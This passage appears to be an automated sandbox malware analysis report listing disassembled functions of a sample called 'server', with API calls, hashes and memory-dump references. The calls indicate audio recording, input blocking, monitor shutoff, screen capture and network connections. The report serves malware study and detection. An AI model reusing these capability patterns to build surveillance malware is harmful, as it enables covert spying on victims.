                                • Instruction Fuzzy Hash: 3D21C176300351ABF310DB65EC88F6BB799EBC5761F10852AF745DB280D6B1A8058771
                                Function 10002EF0 Relevance: 10.6, APIs: 7, Instructions: 84threadCOMMON
                                Download Yara Rule
                                APIs
                                • waveInGetNumDevs.WINMM(?,?,?,10002E20), ref: 10002EF5
                                • CreateThread.KERNEL32(00000000,00000000,10003060,?,00000004,?), ref: 10002F1E
                                • waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?,?,?,?,10002E20), ref: 10002F40
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$CreateDevsOpenThread
                                • String ID:
                                • API String ID: 3981276002-0
                                • Opcode ID: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                • Instruction ID: 398045f82957bc6df3ca42976268de9e0ed9c6986921e5dfa378deda77a8059f
                                • Opcode Fuzzy Hash: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                • Instruction Fuzzy Hash: 0A216DB5240312AFE314CF68DC84F62B7A9FB89350F204669F645CB685CB71E851CBA0
                                Function 1000F740 Relevance: 10.6, APIs: 7, Instructions: 84keyboardwindowsleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(0000000A), ref: 1000F78C
                                • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F7A7
                                • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F7BA
                                • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F7D6
                                • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F7E9
                                  • Part of subcall function 1000F260: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                  • Part of subcall function 1000F260: CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                  • Part of subcall function 1000F260: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                • BlockInput.USER32(?), ref: 1000F7F8
                                  • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000000), ref: 1000FB47
                                  • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000001), ref: 1000FB50
                                • BlockInput.USER32(00000000), ref: 1000F82B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 1415795360-0
                                • Opcode ID: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                • Instruction ID: d37ac442a261cbdb69aff6c5209fa7087b7225f6be27279a8c23c941b82a95ba
                                • Opcode Fuzzy Hash: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                • Instruction Fuzzy Hash: D521F63434839421F944EB344CA3BBA278ACF85BD4F10053DB6956F9C7CEE1A849B655
                                Function 10006D90 Relevance: 10.6, APIs: 7, Instructions: 77threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006DE0
                                • CloseHandle.KERNEL32(00000000), ref: 10006DE9
                                • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006DFA
                                • CloseHandle.KERNEL32(00000000), ref: 10006DFD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005190,00000000,00000000,00000000), ref: 10006E22
                                • CreateThread.KERNEL32(00000000,00000000,Function_00006AD0,00000000,00000000,00000000), ref: 10006E35
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004940,00000000,00000000,00000000), ref: 10006E48
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandle
                                • String ID:
                                • API String ID: 738052048-0
                                • Opcode ID: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                • Instruction ID: bddd40b6041f7b89adb1d7152d05c651aa16d4d0b1a7c0af783e3df771abeb65
                                • Opcode Fuzzy Hash: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                • Instruction Fuzzy Hash: E321427178035576F234AB658C47F466AD5EB94B60F310529F785BF2D0CAF4B8408A5C
                                Function 10003060 Relevance: 10.6, APIs: 7, Instructions: 68windowsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10003072
                                • SetEvent.KERNEL32(?,?,00000000,00000000), ref: 100030A4
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 100030AC
                                • waveInAddBuffer.WINMM(?,000003C0,00000020,?,00000000,00000000), ref: 100030C6
                                • TranslateMessage.USER32(?), ref: 100030DB
                                • DispatchMessageA.USER32(?), ref: 100030E6
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100030F7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                • String ID:
                                • API String ID: 3294988761-0
                                • Opcode ID: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                • Instruction ID: d3f2bca1204f73eed7e2b61ebc1a15db6f1c2b26f9a106d8012aa4ef57a1d5f5
                                • Opcode Fuzzy Hash: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                • Instruction Fuzzy Hash: 6411AF71204351ABF320DF64DC88F67B7E9EB88760F004A2DFA0197290E7B5E908CB61
                                Function 10006CD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006D1F
                                • CloseHandle.KERNEL32(00000000), ref: 10006D28
                                • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006D39
                                • CloseHandle.KERNEL32(00000000), ref: 10006D3C
                                • CreateThread.KERNEL32(00000000,00000000,10006AD0,00000000,00000000,00000000), ref: 10006D74
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandle
                                • String ID: gfff
                                • API String ID: 738052048-1553575800
                                • Opcode ID: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                • Instruction ID: 2020a1e7590e07279854810b9ce9ec764bac815170356a4596bb53d82c307b61
                                • Opcode Fuzzy Hash: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                • Instruction Fuzzy Hash: C711EC72B4031527F228D6299C46F1666D6EBD4760F25412AF745FB2D4C5F4BC408649
                                Function 1000F1A0 Relevance: 10.6, APIs: 7, Instructions: 66synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1DA
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1E2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F0
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F8
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F204
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F20A
                                • DestroyCursor.USER32(?), ref: 1000F234
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                • String ID:
                                • API String ID: 2236516186-0
                                • Opcode ID: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                • Instruction ID: 0f553e4c3eadbe8d6fbd977fb2ead2f207a6b34009dca0ff4597f70e2537c953
                                • Opcode Fuzzy Hash: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                • Instruction Fuzzy Hash: A2215BB5200755ABE324DF59CC80B66F3A9FB89720F110B1DE56283690C7B5B8058B90
                                Function 1000D390 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D3C5
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D3D3
                                • RtlDeleteCriticalSection.NTDLL(?), ref: 1000D40C
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D417
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                • String ID: closesocket$ws2_32.dll
                                • API String ID: 1041861973-181964208
                                • Opcode ID: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                • Instruction ID: 90d420deef0742d789c7d7b03315d7db99f4f8719d0783f2fb5b7f6c44804b8f
                                • Opcode Fuzzy Hash: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                • Instruction Fuzzy Hash: EB11A0755047859BE300DF28CC44B5AB7E8FF49761F400B2EF96AD3290D7B899048AA1
                                Function 10007C20 Relevance: 10.6, APIs: 7, Instructions: 52stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,?,00000000,100075E0,00000000), ref: 10007C31
                                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C3A
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,100075E0,00000000), ref: 10007C41
                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C49
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,100075E0,00000000), ref: 10007C5F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007C72
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007C79
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@ByteCharMultiWidelstrlen$??3@
                                • String ID:
                                • API String ID: 1676418047-0
                                • Opcode ID: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
                                • Instruction ID: e6a01bf69eca8877366d52572196cd1e750499aaefb071a1afc55558adb3dbc2
                                • Opcode Fuzzy Hash: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
                                • Instruction Fuzzy Hash: F7F0C273A052793BF12066A65C89FAB3B5DDB92BB0F100226F614AA2C0D9946C1186B6
                                Function 10003E30 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10003740: RtlEnterCriticalSection.NTDLL(10002690), ref: 10003748
                                  • Part of subcall function 10003740: RtlLeaveCriticalSection.NTDLL(10002690), ref: 10003761
                                • _ftol.MSVCRT ref: 10003E6F
                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 10003EAE
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$??2@??3@EnterLeave_ftol
                                • String ID:
                                • API String ID: 2245774403-0
                                • Opcode ID: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                • Instruction ID: 4abf8248d303709f5cc18c5d73ebea0275a85850dc47ce3d48f28f5182355441
                                • Opcode Fuzzy Hash: d43c15c9dc710f9c4bc954111707159e1ff32841bea0643a9bd1dc03e9c16b30
                                • Instruction Fuzzy Hash: C34196797047045BE705EF249C42A7FB39DEBC4794F00492DFA0597286EE34B90D87A2
                                Function 10010240 Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FD4A,?,?,00000001), ref: 1001026B
                                • GetDC.USER32(00000000), ref: 100102C6
                                • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 100102D3
                                • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100102E6
                                • ReleaseDC.USER32(00000000,00000000), ref: 100102EF
                                • DeleteObject.GDI32(00000000), ref: 100102F6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
                                • String ID:
                                • API String ID: 1095915628-0
                                • Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                • Instruction ID: 78a216903de2e8302ceba6b2a70ee99028da7e5e411dfa4f1e5e99106784fed4
                                • Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                                • Instruction Fuzzy Hash: 9F31F5712057418FE324CF29CC84B5AFBE6FF85304F188A6DE5958F2A1E7B1A549CB50
                                Function 10011DC0 Relevance: 9.1, APIs: 6, Instructions: 100stringsleepmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT ref: 10006E9B
                                  • Part of subcall function 10006E70: ??2@YAPAXI@Z.MSVCRT(?), ref: 10006EAA
                                • lstrlen.KERNEL32(?), ref: 10011E0B
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 10011E28
                                • lstrlen.KERNEL32(?), ref: 10011E68
                                • Sleep.KERNEL32(00000001), ref: 10011EAD
                                • LocalSize.KERNEL32(00000000), ref: 10011EB4
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 10011EC6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$??2@lstrlen$AllocFreeSizeSleep
                                • String ID:
                                • API String ID: 3002304083-0
                                • Opcode ID: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                • Instruction ID: 77e4d1ca07d08acbcddfd6096d60104819a82ef412391c00f2a2c794c29ddd91
                                • Opcode Fuzzy Hash: 2f0adfffeb334e18917d6daae7ad8ba864390cce98521ba1c7aec059076dbe97
                                • Instruction Fuzzy Hash: D131AE756083428FD314CF58C884B5ABBE5FB89750F500A1CF99697350DB74ED45CB92
                                Function 100050A0 Relevance: 9.1, APIs: 6, Instructions: 86threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 100050A8
                                • gethostbyname.WS2_32(?), ref: 100050B4
                                • inet_ntoa.WS2_32(?), ref: 100050DE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000514C
                                • CloseHandle.KERNEL32(00000000), ref: 1000514F
                                • CreateThread.KERNEL32(00000000,00000000,10004FF0,00000000,00000000,00000000), ref: 1000517B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                • Instruction ID: cfe0648d242c00018cb7dca233d2f890e554d2c8424b1bc925b856dd57eae328
                                • Opcode Fuzzy Hash: 033d0ddaf9bd5aa833e53fe520b2a97e6b5e9bfbca6cc5c265d62fdae6fdf5d4
                                • Instruction Fuzzy Hash: 3C21E2327403155BE328DB389C85B6B77E2FB84760F65462DFA52A72D0CEF4AC048658
                                Function 10004220 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10004228
                                • gethostbyname.WS2_32(?), ref: 10004234
                                • inet_ntoa.WS2_32(?), ref: 1000425E
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100042CC
                                • CloseHandle.KERNEL32(00000000), ref: 100042CF
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 100042F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                • Instruction ID: bd1dde3535a19e8c7e55d02713a8ca2fab0bdaef4a4b0867c8bad2423498b820
                                • Opcode Fuzzy Hash: 9601f318078ff8162673fcfb5c04afe03e9b2cf260f9edf1260973535f350d36
                                • Instruction Fuzzy Hash: 2821C7727403155BE328DB349C45B2A76E2FBC4760F65461DFA56A72D0CEB4EC048618
                                Function 10004C80 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(00000002), ref: 10004C88
                                • gethostbyname.WS2_32(00000002), ref: 10004C94
                                • inet_ntoa.WS2_32(?), ref: 10004CBE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004D2C
                                • CloseHandle.KERNEL32(00000000), ref: 10004D2F
                                • CreateThread.KERNEL32(00000000,00000000,10004BC0,00000000,00000000,00000000), ref: 10004D58
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
